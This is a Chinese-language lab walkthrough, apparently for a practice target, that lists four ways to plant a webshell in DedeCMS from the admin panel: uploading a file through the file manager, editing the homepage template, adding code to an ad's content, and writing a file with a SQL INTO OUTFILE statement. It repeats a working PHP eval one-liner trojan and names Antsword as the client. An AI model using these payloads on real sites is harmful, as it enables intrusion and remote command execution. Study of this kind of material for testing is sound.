先进行安装

然后进入首页和管理员后台  内容要在后台进行操作

首页

后台

1.通过文件管理器上传WebShell

访问目标靶场其思路为 dedecms 后台可以直接上传任意文件，可以通过文件管理器上传php文件获取webshel

登陆到后台点击【核心】【文件式管理器】【文件上传】将准备好的一句话代
码上传

2.修改模板文件拿shell

   点击模板 默认模板管理  index.html 然后点击修改

写入一句话木马<?php phpinfo();eval($_POST['cmd']);?>

然后保存

接着点击生成 更新主页HTML--》将主页位置修改为【../index.php】--》点击 【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化…

3.后台任意命令执行拿WebShell

<?php phpinfo();eval($_POST['cmd']);?>

步骤一:点击 【模块】 --》 【广告管理】--》〔【增加一个新广告】--》在【广告内容】 处添
加一句话代码--》点击 【确定】

步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!

拿蚁剑测试连接

4.SQL命令行

输入一句话木马

select "<?php phpinfo();eval($_POST['cmd']);?>" into outfile "D:/phpstudy_pro/WWW/uploads/shell.php"